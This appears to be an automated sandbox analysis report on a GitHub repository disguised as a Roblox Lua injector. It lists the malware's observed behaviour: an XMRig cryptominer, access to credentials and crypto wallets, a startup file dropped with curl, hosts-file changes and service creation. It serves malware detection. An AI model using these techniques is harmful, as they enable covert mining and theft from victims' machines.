Analysis
-
max time kernel
125s -
max time network
134s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
15/01/2025, 22:06
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/Smug234/Roblox-Lua-Injector
Resource
win11-20241007-en
General
-
Target
https://github.com/Smug234/Roblox-Lua-Injector
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 7 IoCs
resource yara_rule behavioral1/memory/5400-801-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/5400-802-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/5400-804-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/5400-803-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/5400-800-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/5400-798-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/5400-797-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
pid Process 5596 powershell.exe 1088 powershell.exe 1360 powershell.exe 3396 powershell.exe 4676 powershell.exe 4120 powershell.exe 5028 powershell.exe 1560 powershell.exe 3324 powershell.exe 3324 powershell.exe 3020 powershell.exe 4032 powershell.exe 3632 powershell.exe 4896 powershell.exe 5028 powershell.exe 1560 powershell.exe 1088 powershell.exe 5196 powershell.exe 5464 powershell.exe 5256 powershell.exe -
Creates new service(s) 2 TTPs
-
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Bootstrapper.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 4 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 3900 cmd.exe 5608 powershell.exe 1028 cmd.exe 2876 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Built.exe curl.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Built.exe curl.exe -
Executes dropped EXE 4 IoCs
pid Process 488 bound.exe 6092 rar.exe 396 arihotnjnjhl.exe 4528 bound.exe -
Loads dropped DLL 33 IoCs
pid Process 1320 Bootstrapper.exe 1320 Bootstrapper.exe 1320 Bootstrapper.exe 1320 Bootstrapper.exe 1320 Bootstrapper.exe 1320 Bootstrapper.exe 1320 Bootstrapper.exe 1320 Bootstrapper.exe 1320 Bootstrapper.exe 1320 Bootstrapper.exe 1320 Bootstrapper.exe 1320 Bootstrapper.exe 1320 Bootstrapper.exe 1320 Bootstrapper.exe 1320 Bootstrapper.exe 1320 Bootstrapper.exe 1320 Bootstrapper.exe 3500 Bootstrapper.exe 3500 Bootstrapper.exe 3500 Bootstrapper.exe 3500 Bootstrapper.exe 3500 Bootstrapper.exe 3500 Bootstrapper.exe 3500 Bootstrapper.exe 3500 Bootstrapper.exe 3500 Bootstrapper.exe 3500 Bootstrapper.exe 3500 Bootstrapper.exe 3500 Bootstrapper.exe 3500 Bootstrapper.exe 3500 Bootstrapper.exe 3500 Bootstrapper.exe 3500 Bootstrapper.exe -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 22 ip-api.com 42 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 464 powercfg.exe 3888 powercfg.exe 6024 powercfg.exe 5672 powercfg.exe 5664 powercfg.exe 2912 powercfg.exe 5760 powercfg.exe 6016 powercfg.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe bound.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe arihotnjnjhl.exe -
Enumerates processes with tasklist 1 TTPs 8 IoCs
pid Process 2152 tasklist.exe 5388 tasklist.exe 2804 tasklist.exe 4668 tasklist.exe 5716 tasklist.exe 5740 tasklist.exe 460 tasklist.exe 6004 tasklist.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 396 set thread context of 5964 396 arihotnjnjhl.exe 317 PID 396 set thread context of 5400 396 arihotnjnjhl.exe 322 -
resource yara_rule behavioral1/files/0x001900000002ac3a-415.dat upx behavioral1/memory/1320-419-0x00007FF86B970000-0x00007FF86BDDE000-memory.dmp upx behavioral1/files/0x001c00000002ac26-421.dat upx behavioral1/files/0x001900000002ac31-443.dat upx behavioral1/files/0x001900000002ac2e-442.dat upx behavioral1/files/0x001900000002ac2d-441.dat upx behavioral1/files/0x001c00000002ac2c-440.dat upx behavioral1/files/0x001900000002ac2b-439.dat upx behavioral1/files/0x001900000002ac28-438.dat upx behavioral1/files/0x001900000002ac27-437.dat upx behavioral1/files/0x001900000002ac25-436.dat upx behavioral1/files/0x001900000002ac42-435.dat upx behavioral1/files/0x001900000002ac41-434.dat upx behavioral1/files/0x001900000002ac40-433.dat upx behavioral1/files/0x001900000002ac39-430.dat upx behavioral1/files/0x001400000002ac37-429.dat upx behavioral1/memory/1320-426-0x00007FF8833B0000-0x00007FF8833BF000-memory.dmp upx behavioral1/memory/1320-425-0x00007FF86B940000-0x00007FF86B964000-memory.dmp upx behavioral1/files/0x001c00000002ac38-424.dat upx behavioral1/memory/1320-449-0x00007FF86B910000-0x00007FF86B93D000-memory.dmp upx behavioral1/memory/1320-451-0x00007FF86B8F0000-0x00007FF86B909000-memory.dmp upx behavioral1/memory/1320-453-0x00007FF86B8D0000-0x00007FF86B8EF000-memory.dmp upx behavioral1/memory/1320-455-0x00007FF86B750000-0x00007FF86B8C1000-memory.dmp upx behavioral1/memory/1320-458-0x00007FF86B730000-0x00007FF86B749000-memory.dmp upx behavioral1/memory/1320-459-0x00007FF880210000-0x00007FF88021D000-memory.dmp upx behavioral1/memory/1320-465-0x00007FF86B700000-0x00007FF86B72E000-memory.dmp upx behavioral1/memory/1320-468-0x00007FF86B640000-0x00007FF86B6F8000-memory.dmp upx behavioral1/memory/1320-466-0x00007FF86B2C0000-0x00007FF86B635000-memory.dmp upx behavioral1/memory/1320-464-0x00007FF86B970000-0x00007FF86BDDE000-memory.dmp upx behavioral1/memory/1320-473-0x00007FF87FFE0000-0x00007FF87FFED000-memory.dmp upx behavioral1/memory/1320-472-0x00007FF86B2A0000-0x00007FF86B2B4000-memory.dmp upx behavioral1/memory/1320-471-0x00007FF86B940000-0x00007FF86B964000-memory.dmp upx behavioral1/memory/1320-478-0x00007FF86B0E0000-0x00007FF86B1F8000-memory.dmp upx behavioral1/memory/1320-578-0x00007FF86B8D0000-0x00007FF86B8EF000-memory.dmp upx behavioral1/memory/1320-596-0x00007FF86B750000-0x00007FF86B8C1000-memory.dmp upx behavioral1/memory/1320-597-0x00007FF86B730000-0x00007FF86B749000-memory.dmp upx behavioral1/memory/1320-683-0x00007FF86B700000-0x00007FF86B72E000-memory.dmp upx behavioral1/memory/1320-684-0x00007FF86B2C0000-0x00007FF86B635000-memory.dmp upx behavioral1/memory/1320-687-0x00007FF86B640000-0x00007FF86B6F8000-memory.dmp upx behavioral1/memory/1320-711-0x00007FF86B8D0000-0x00007FF86B8EF000-memory.dmp upx behavioral1/memory/1320-720-0x00007FF86B0E0000-0x00007FF86B1F8000-memory.dmp upx behavioral1/memory/1320-712-0x00007FF86B750000-0x00007FF86B8C1000-memory.dmp upx behavioral1/memory/1320-707-0x00007FF86B940000-0x00007FF86B964000-memory.dmp upx behavioral1/memory/1320-706-0x00007FF86B970000-0x00007FF86BDDE000-memory.dmp upx behavioral1/memory/1320-736-0x00007FF8833B0000-0x00007FF8833BF000-memory.dmp upx behavioral1/memory/1320-741-0x00007FF86B8D0000-0x00007FF86B8EF000-memory.dmp upx behavioral1/memory/1320-746-0x00007FF86B2C0000-0x00007FF86B635000-memory.dmp upx behavioral1/memory/1320-745-0x00007FF86B700000-0x00007FF86B72E000-memory.dmp upx behavioral1/memory/1320-744-0x00007FF86B730000-0x00007FF86B749000-memory.dmp upx behavioral1/memory/1320-743-0x00007FF880210000-0x00007FF88021D000-memory.dmp upx behavioral1/memory/1320-742-0x00007FF86B750000-0x00007FF86B8C1000-memory.dmp upx behavioral1/memory/1320-740-0x00007FF86B8F0000-0x00007FF86B909000-memory.dmp upx behavioral1/memory/1320-739-0x00007FF86B910000-0x00007FF86B93D000-memory.dmp upx behavioral1/memory/1320-738-0x00007FF86B640000-0x00007FF86B6F8000-memory.dmp upx behavioral1/memory/1320-737-0x00007FF86B940000-0x00007FF86B964000-memory.dmp upx behavioral1/memory/1320-735-0x00007FF86B0E0000-0x00007FF86B1F8000-memory.dmp upx behavioral1/memory/1320-721-0x00007FF86B970000-0x00007FF86BDDE000-memory.dmp upx behavioral1/memory/1320-734-0x00007FF87FFE0000-0x00007FF87FFED000-memory.dmp upx behavioral1/memory/1320-733-0x00007FF86B2A0000-0x00007FF86B2B4000-memory.dmp upx behavioral1/memory/5400-792-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/5400-796-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/5400-801-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/5400-802-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/5400-804-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 6116 sc.exe 4208 sc.exe 4900 sc.exe 1476 sc.exe 4164 sc.exe 6132 sc.exe 5952 sc.exe 4540 sc.exe 4688 sc.exe 3764 sc.exe 4936 sc.exe 5556 sc.exe 864 sc.exe 2776 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 1828 cmd.exe 5740 netsh.exe 5812 cmd.exe 1752 netsh.exe -
Detects videocard installed 1 TTPs 2 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2780 WMIC.exe 5496 WMIC.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.
pid Process 5828 systeminfo.exe 2204 systeminfo.exe -
Kills process with taskkill 16 IoCs
pid Process 5648 taskkill.exe 5836 taskkill.exe 6016 taskkill.exe 4684 taskkill.exe 3156 taskkill.exe 5652 taskkill.exe 6080 taskkill.exe 1336 taskkill.exe 5704 taskkill.exe 4544 taskkill.exe 1360 taskkill.exe 444 taskkill.exe 4368 taskkill.exe 5504 taskkill.exe 2396 taskkill.exe 3584 taskkill.exe -
Modifies data under HKEY_USERS 46 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings msedge.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Roblox-Lua-Injector-main.zip:Zone.Identifier msedge.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 548 msedge.exe 548 msedge.exe 1824 msedge.exe 1824 msedge.exe 1696 msedge.exe 1696 msedge.exe 1876 identity_helper.exe 1876 identity_helper.exe 2292 msedge.exe 2292 msedge.exe 1560 powershell.exe 1560 powershell.exe 1560 powershell.exe 3324 powershell.exe 3324 powershell.exe 3324 powershell.exe 1088 powershell.exe 1088 powershell.exe 4120 powershell.exe 4120 powershell.exe 3020 powershell.exe 3020 powershell.exe 1088 powershell.exe 1088 powershell.exe 4032 powershell.exe 4032 powershell.exe 4120 powershell.exe 4120 powershell.exe 5608 powershell.exe 5608 powershell.exe 3020 powershell.exe 3020 powershell.exe 5940 powershell.exe 5940 powershell.exe 5608 powershell.exe 4032 powershell.exe 5940 powershell.exe 5596 powershell.exe 5596 powershell.exe 5596 powershell.exe 5876 powershell.exe 5876 powershell.exe 1088 powershell.exe 1088 powershell.exe 2380 powershell.exe 2380 powershell.exe 488 bound.exe 3632 powershell.exe 3632 powershell.exe 488 bound.exe 488 bound.exe 488 bound.exe 488 bound.exe 488 bound.exe 488 bound.exe 488 bound.exe 488 bound.exe 488 bound.exe 488 bound.exe 488 bound.exe 488 bound.exe 488 bound.exe 488 bound.exe 396 arihotnjnjhl.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
pid Process 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1560 powershell.exe Token: SeDebugPrivilege 3324 powershell.exe Token: SeDebugPrivilege 1088 powershell.exe Token: SeDebugPrivilege 4120 powershell.exe Token: SeDebugPrivilege 2804 tasklist.exe Token: SeDebugPrivilege 4668 tasklist.exe Token: SeDebugPrivilege 3020 powershell.exe Token: SeIncreaseQuotaPrivilege 3328 WMIC.exe Token: SeSecurityPrivilege 3328 WMIC.exe Token: SeTakeOwnershipPrivilege 3328 WMIC.exe Token: SeLoadDriverPrivilege 3328 WMIC.exe Token: SeSystemProfilePrivilege 3328 WMIC.exe Token: SeSystemtimePrivilege 3328 WMIC.exe Token: SeProfSingleProcessPrivilege 3328 WMIC.exe Token: SeIncBasePriorityPrivilege 3328 WMIC.exe Token: SeCreatePagefilePrivilege 3328 WMIC.exe Token: SeBackupPrivilege 3328 WMIC.exe Token: SeRestorePrivilege 3328 WMIC.exe Token: SeShutdownPrivilege 3328 WMIC.exe Token: SeDebugPrivilege 3328 WMIC.exe Token: SeSystemEnvironmentPrivilege 3328 WMIC.exe Token: SeRemoteShutdownPrivilege 3328 WMIC.exe Token: SeUndockPrivilege 3328 WMIC.exe Token: SeManageVolumePrivilege 3328 WMIC.exe Token: 33 3328 WMIC.exe Token: 34 3328 WMIC.exe Token: 35 3328 WMIC.exe Token: 36 3328 WMIC.exe Token: SeDebugPrivilege 4032 powershell.exe Token: SeIncreaseQuotaPrivilege 3328 WMIC.exe Token: SeSecurityPrivilege 3328 WMIC.exe Token: SeTakeOwnershipPrivilege 3328 WMIC.exe Token: SeLoadDriverPrivilege 3328 WMIC.exe Token: SeSystemProfilePrivilege 3328 WMIC.exe Token: SeSystemtimePrivilege 3328 WMIC.exe Token: SeProfSingleProcessPrivilege 3328 WMIC.exe Token: SeIncBasePriorityPrivilege 3328 WMIC.exe Token: SeCreatePagefilePrivilege 3328 WMIC.exe Token: SeBackupPrivilege 3328 WMIC.exe Token: SeRestorePrivilege 3328 WMIC.exe Token: SeShutdownPrivilege 3328 WMIC.exe Token: SeDebugPrivilege 3328 WMIC.exe Token: SeSystemEnvironmentPrivilege 3328 WMIC.exe Token: SeRemoteShutdownPrivilege 3328 WMIC.exe Token: SeUndockPrivilege 3328 WMIC.exe Token: SeManageVolumePrivilege 3328 WMIC.exe Token: 33 3328 WMIC.exe Token: 34 3328 WMIC.exe Token: 35 3328 WMIC.exe Token: 36 3328 WMIC.exe Token: SeDebugPrivilege 5608 powershell.exe Token: SeDebugPrivilege 5716 tasklist.exe Token: SeDebugPrivilege 5940 powershell.exe Token: SeDebugPrivilege 5740 tasklist.exe Token: SeDebugPrivilege 5652 taskkill.exe Token: SeDebugPrivilege 5648 taskkill.exe Token: SeDebugPrivilege 6016 taskkill.exe Token: SeDebugPrivilege 5836 taskkill.exe Token: SeDebugPrivilege 6080 taskkill.exe Token: SeDebugPrivilege 5504 taskkill.exe Token: SeDebugPrivilege 4684 taskkill.exe Token: SeDebugPrivilege 1336 taskkill.exe Token: SeDebugPrivilege 2396 taskkill.exe Token: SeDebugPrivilege 4544 taskkill.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe -
Suspicious use of SendNotifyMessage 12 IoCs
pid Process 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe 1824 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1824 wrote to memory of 864 1824 msedge.exe 78 PID 1824 wrote to memory of 864 1824 msedge.exe 78 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 1556 1824 msedge.exe 79 PID 1824 wrote to memory of 548 1824 msedge.exe 80 PID 1824 wrote to memory of 548 1824 msedge.exe 80 PID 1824 wrote to memory of 428 1824 msedge.exe 81 PID 1824 wrote to memory of 428 1824 msedge.exe 81 PID 1824 wrote to memory of 428 1824 msedge.exe 81 PID 1824 wrote to memory of 428 1824 msedge.exe 81 PID 1824 wrote to memory of 428 1824 msedge.exe 81 PID 1824 wrote to memory of 428 1824 msedge.exe 81 PID 1824 wrote to memory of 428 1824 msedge.exe 81 PID 1824 wrote to memory of 428 1824 msedge.exe 81 PID 1824 wrote to memory of 428 1824 msedge.exe 81 PID 1824 wrote to memory of 428 1824 msedge.exe 81 PID 1824 wrote to memory of 428 1824 msedge.exe 81 PID 1824 wrote to memory of 428 1824 msedge.exe 81 PID 1824 wrote to memory of 428 1824 msedge.exe 81 PID 1824 wrote to memory of 428 1824 msedge.exe 81 PID 1824 wrote to memory of 428 1824 msedge.exe 81 PID 1824 wrote to memory of 428 1824 msedge.exe 81 PID 1824 wrote to memory of 428 1824 msedge.exe 81 PID 1824 wrote to memory of 428 1824 msedge.exe 81 PID 1824 wrote to memory of 428 1824 msedge.exe 81 PID 1824 wrote to memory of 428 1824 msedge.exe 81 -
Views/modifies file attributes 1 TTPs 4 IoCs
pid Process 5292 attrib.exe 6136 attrib.exe 1060 attrib.exe 3424 attrib.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/Smug234/Roblox-Lua-Injector1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1824 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8801b3cb8,0x7ff8801b3cc8,0x7ff8801b3cd82⤵PID:864
-
-
